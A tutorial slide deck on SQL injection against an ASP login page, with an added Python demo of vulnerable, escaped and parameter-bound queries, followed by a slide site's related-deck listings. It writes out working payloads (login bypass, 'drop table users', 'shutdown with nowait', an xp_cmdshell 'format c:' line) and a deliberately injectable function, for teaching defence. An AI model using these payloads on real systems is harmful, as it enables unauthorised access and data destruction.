SQL Injection Attacks Siddhesh Bhobe
SQL Injection Attack...
"Injects" or manipulates SQL code using "string-building" techniques. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways. Attacks succeed because of poor input validation at the code layer.

Example 1: HTML Form
Consider the following HTML form for login:

  <form name="frmLogin" action="login.asp" method="post">
    Username: <input type="text" name="userName">
    Password: <input type="text" name="password">
    <input type="submit">
  </form>

Example 1: ASP Script

  <%
    ...
    userName = Request.Form("userName")
    password = Request.Form("password")
    query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
    ...
  %>

Sample Input
Login = john, Password = doe

  select count(*) from users where userName='john' and userPass='doe'

Now check this!
Login = john, Password = ' or 1=1 --

  select count(*) from users where userName='john' and userPass='' or 1=1 --'

The password check is nullified. The trailing -- comments out the rest of the statement, so the mismatched quote never reaches SQL Server and ASP does not report an error.

And what about this?
Username: ' or 1=1 --   Password: [Empty]

  select count(*) from users where userName='' or 1=1 --' and userPass=''

Example 2
Username: ' having 1=1 --   Password: [Empty]

  select userName from users where userName='' having 1=1

You get a column name...
You will get the following error message:

  Microsoft OLE DB Provider for SQL Server (0x80040E14)
  Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
  /login.asp, line 16

The Attack...
Username: ' or users.userName like 'a%' --

  select userName from users where userName='' or users.userName like 'a%' --' and userPass=''

Logged in as admin!!!
Use of Semicolon
A semicolon allows multiple queries to be specified on one line. They are submitted as one batch and executed sequentially:

  select 1; select 1+2; select 1+3;

Can you guess what happens?
Username: ' or 1=1; drop table users; --

Table dropped!
Username: ' or 1=1; drop table users; --   Password: [Anything]
Firstly, it selects the userName field for all rows in the users table. Secondly, it deletes the users table.

SHUTDOWN WITH NOWAIT!!
... causes SQL Server to shut down, immediately stopping the Windows service.
Username: '; shutdown with nowait; --

  select userName from users where userName=''; shutdown with nowait; --' and userPass=''

Products.asp

  http://localhost/products.asp?productId=1

returns "Got product Pink Hoola Hoop". But what about this?

  http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))

Wham!
Here is the query without the URL-encoded spaces:

  http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))

This runs an INSERT on the products table, adding the first 50 characters of SQL Server's @@version variable as a new record.
Effects: Privilege Level sa
- Total control of SQL Server
- OS shell at the privilege of the MSSQLServer service, via xp_cmdshell
- Ability to read, write and mutilate all data

Effects: Privilege Level db_owner
- Read/write all data in the affected database
- Drop tables
- Create new objects
- Take control of the database

Effects: Privilege Level normal user (no fixed server or database roles)
- Access only the objects to which permission has been granted
- At best, only a few stored procedures
- At worst, read/write access to all tables
Recommended!

Testing for Vulnerability
- Disable error handling so that errors are displayed
- Input single quotes to see if the application fails
- Failure indicates poor validation and corruption of the SQL
Preventing SQL Injection Attacks
- Limit user access
- Escape quotes
- Remove culprit characters
- Limit the length of user input

Limit User Access
- Do not use the "sa" account
- Remove extended stored procedures if you are not using them. Two of the most damaging are xp_cmdshell and xp_grantlogin
- Use stored procedures to abstract data access

Escape Quotes
Escape each single quote in the input by doubling it:

  <%
    function stripQuotes(strWords)
      stripQuotes = replace(strWords, "'", "''")
    end function
  %>

Applied to the injected password, this converts

  select count(*) from users where userName='john' and userPass='' or 1=1 --'

into

  select count(*) from users where userName='john' and userPass=''' or 1=1 --'

so the whole input is now a string literal compared against userPass.

Drop Culprit Characters
Drop character sequences such as ; , -- , insert and xp_ . For example,

  select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; --

becomes

  select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB

Restrict Length of User Input
- Limit the length in the form field
- Use validating functions for numeric input
- Use POST, not GET
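The login flow of Example 1 together with the mitigations from the Escape Quotes, Drop Culprit Characters and Restrict Length slides, as an added runnable example that is not code from the original deck: it builds the query by concatenation as login.asp does, applies a port of the slide's stripQuotes to the inputs, and adds parameter binding, which the slides do not cover but is the standard fix. SQLite stands in for SQL Server, the users table and its rows are constructed, and every function name is mine.

```python
import re
import sqlite3

# Constructed stand-in for the slides' users table; SQLite replaces SQL Server.
# Plaintext userPass mirrors the slides' schema; real systems store password hashes.
SAMPLE_USERS = [("admin", "s3cret"), ("john", "doe")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userName text, userPass text)")
    conn.executemany("insert into users (userName, userPass) values (?, ?)", SAMPLE_USERS)
    return conn


def build_login_query(user_name: str, password: str) -> str:
    """The login.asp query from the slides, built by string concatenation."""
    return ("select count(*) from users where userName='" + user_name
            + "' and userPass='" + password + "'")


def login_unsafe(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    """Vulnerable: whatever the user typed becomes part of the SQL text."""
    return conn.execute(build_login_query(user_name, password)).fetchone()[0] > 0


def strip_quotes(words: str) -> str:
    """Port of the slide's VBScript stripQuotes: double every single quote."""
    return words.replace("'", "''")


def login_escaped(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    """The slides' mitigation: escape each input before concatenating it."""
    query = build_login_query(strip_quotes(user_name), strip_quotes(password))
    return conn.execute(query).fetchone()[0] > 0


def login_bound(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    """Parameter binding (not in the slides): inputs travel as data, never as SQL."""
    row = conn.execute(
        "select count(*) from users where userName=? and userPass=?",
        (user_name, password),
    ).fetchone()
    return row[0] > 0


CULPRIT_SEQUENCES = (";", "--", "insert", "xp_")   # the list from the slide


def drop_culprit_sequences(raw: str) -> str:
    """The slide's blacklist filter. It is brittle in both directions: anything
    not on the list passes untouched, and legitimate text that happens to
    contain a listed word is mangled."""
    cleaned = raw
    for seq in CULPRIT_SEQUENCES:
        cleaned = re.sub(re.escape(seq), "", cleaned, flags=re.IGNORECASE)
    return cleaned


def parse_product_id(raw: str):
    """Numeric validation for products.asp?productId=...: digits only, else None."""
    return int(raw) if re.fullmatch(r"\d+", raw) else None


if __name__ == "__main__":
    conn = make_db()
    injected = "' or 1=1 --"   # the password from the "Now check this!" slide
    print(build_login_query("john", injected))
    print("unsafe :", login_unsafe(conn, "john", injected))    # True: check nullified
    print("escaped:", login_escaped(conn, "john", injected))   # False
    print("bound  :", login_bound(conn, "john", injected))     # False
    print(repr(drop_culprit_sequences("1; drop table users; --")))
    print(parse_product_id("0;insert into products(prodName) values(left(@@version,50))"))
```

Note that drop_culprit_sequences leaves "drop table users" intact because the slide's list does not name it, while parse_product_id rejects the whole products.asp payload by accepting digits only.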
Thanks!
Original article: http://www.webmasterbase.com/article.php?aid=794&pid=0
Also on Reismagos...
Ad

More Related Content

What's hot (20)

Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
Sql injection
Sql injectionSql injection
Sql injection
Nitish Kumar
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
JW CyberNerd
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
Magno Logan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
Jawhar Ali
 
Asp
AspAsp
Asp
Adil Jafri
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
Kumar
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
Stacy Watts
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
SQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQLSQL Injection in action with PHP and MySQL
SQL Injection in action with PHP and MySQL
Pradeep Kumar
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
JW CyberNerd
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
Magno Logan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
Jawhar Ali
 
Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
Kumar
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
Stacy Watts
 

Viewers also liked (18)

Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
Rich Helton
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
Nuno Loureiro
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Marios Siganos
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
SQL injection and SYN attack
SQL injection and SYN attackSQL injection and SYN attack
SQL injection and SYN attack
Tesfahunegn Minwuyelet
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
Eoin Keary
 
Threat modeling librarian freedom conference
Threat modeling   librarian freedom conferenceThreat modeling   librarian freedom conference
Threat modeling librarian freedom conference
evacide
 
Neutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQLNeutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
SQL Injection - The Unknown Story
SQL Injection - The Unknown StorySQL Injection - The Unknown Story
SQL Injection - The Unknown Story
Imperva
 
SQL injection
SQL injectionSQL injection
SQL injection
Akash Panchal
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injection
jpubal
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
Rich Helton
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
Nuno Loureiro
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
Kevin Kline
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
Eoin Keary
 
Threat modeling librarian freedom conference
Threat modeling   librarian freedom conferenceThreat modeling   librarian freedom conference
Threat modeling librarian freedom conference
evacide
 
Neutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQLNeutralizing SQL Injection in PostgreSQL
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
SQL Injection - The Unknown Story
SQL Injection - The Unknown StorySQL Injection - The Unknown Story
SQL Injection - The Unknown Story
Imperva
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injection
jpubal
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 
Ad

Similar to Sql Injection Attacks Siddhesh (20)

12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
webhostingguy
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
Compare Infobase Limited
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
Mostafa Siraj
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
secure php
secure phpsecure php
secure php
Riyad Bin Zaman
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Boston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on RailsBoston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on Rails
John Brunswick
 
Sql Injection
Sql Injection Sql Injection
Sql Injection
Sanjeev Kumar Jaiswal
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
Aung Khant
 
Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
Open Source Package PHP & MySQL
Open Source Package PHP & MySQLOpen Source Package PHP & MySQL
Open Source Package PHP & MySQL
kalaisai
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville   Web Security 1012009 Barcamp Nashville   Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
grutz
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
How did i steal your database
How did i steal your databaseHow did i steal your database
How did i steal your database
Mostafa Siraj
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Boston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on RailsBoston Computing Review - Ruby on Rails
Boston Computing Review - Ruby on Rails
John Brunswick
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
Aung Khant
 
Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
Open Source Package PHP & MySQL
Open Source Package PHP & MySQLOpen Source Package PHP & MySQL
Open Source Package PHP & MySQL
kalaisai
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville   Web Security 1012009 Barcamp Nashville   Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
grutz
 
Ad

More from Siddhesh Bhobe (16)

eMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, LondoneMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, London
Siddhesh Bhobe
 
Industry expectations from new recruits
Industry expectations from new recruitsIndustry expectations from new recruits
Industry expectations from new recruits
Siddhesh Bhobe
 
The eMee Value Proposition
The eMee Value PropositionThe eMee Value Proposition
The eMee Value Proposition
Siddhesh Bhobe
 
Redefining Employee Engagement
Redefining Employee EngagementRedefining Employee Engagement
Redefining Employee Engagement
Siddhesh Bhobe
 
Introduction to eMee
Introduction to eMeeIntroduction to eMee
Introduction to eMee
Siddhesh Bhobe
 
Tour Of Europe
Tour Of EuropeTour Of Europe
Tour Of Europe
Siddhesh Bhobe
 
Software As Solutions
Software As SolutionsSoftware As Solutions
Software As Solutions
Siddhesh Bhobe
 
Effective ALM
Effective ALMEffective ALM
Effective ALM
Siddhesh Bhobe
 
Bit Vectors Siddhesh
Bit Vectors SiddheshBit Vectors Siddhesh
Bit Vectors Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3
Siddhesh Bhobe
 
Introduction To Dot Net Siddhesh
Introduction To Dot Net SiddheshIntroduction To Dot Net Siddhesh
Introduction To Dot Net Siddhesh
Siddhesh Bhobe
 
Ruby On Rails Siddhesh
Ruby On Rails SiddheshRuby On Rails Siddhesh
Ruby On Rails Siddhesh
Siddhesh Bhobe
 
Six Thinking Hats Siddhesh
Six Thinking Hats SiddheshSix Thinking Hats Siddhesh
Six Thinking Hats Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3
Siddhesh Bhobe
 
Software Accessibility Siddhesh
Software Accessibility SiddheshSoftware Accessibility Siddhesh
Software Accessibility Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3
Siddhesh Bhobe
 
eMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, LondoneMee at HR Tech Europe, 26 March, London
eMee at HR Tech Europe, 26 March, London
Siddhesh Bhobe
 
Industry expectations from new recruits
Industry expectations from new recruitsIndustry expectations from new recruits
Industry expectations from new recruits
Siddhesh Bhobe
 
The eMee Value Proposition
The eMee Value PropositionThe eMee Value Proposition
The eMee Value Proposition
Siddhesh Bhobe
 
Redefining Employee Engagement
Redefining Employee EngagementRedefining Employee Engagement
Redefining Employee Engagement
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3Anti Patterns Siddhesh Lecture1 Of3
Anti Patterns Siddhesh Lecture1 Of3
Siddhesh Bhobe
 
Introduction To Dot Net Siddhesh
Introduction To Dot Net SiddheshIntroduction To Dot Net Siddhesh
Introduction To Dot Net Siddhesh
Siddhesh Bhobe
 
Ruby On Rails Siddhesh
Ruby On Rails SiddheshRuby On Rails Siddhesh
Ruby On Rails Siddhesh
Siddhesh Bhobe
 
Six Thinking Hats Siddhesh
Six Thinking Hats SiddheshSix Thinking Hats Siddhesh
Six Thinking Hats Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3Anti Patterns Siddhesh Lecture2 Of3
Anti Patterns Siddhesh Lecture2 Of3
Siddhesh Bhobe
 
Software Accessibility Siddhesh
Software Accessibility SiddheshSoftware Accessibility Siddhesh
Software Accessibility Siddhesh
Siddhesh Bhobe
 
Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3Anti Patterns Siddhesh Lecture3 Of3
Anti Patterns Siddhesh Lecture3 Of3
Siddhesh Bhobe
 

Recently uploaded (20)

AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Top 10 IT Help Desk Outsourcing Services
Top 10 IT Help Desk Outsourcing ServicesTop 10 IT Help Desk Outsourcing Services
Top 10 IT Help Desk Outsourcing Services
Infrassist Technologies Pvt. Ltd.
 
Web and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in RajpuraWeb and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in Rajpura
Erginous Technology
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
Build 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHSBuild 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHS
TECH EHS Solution
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
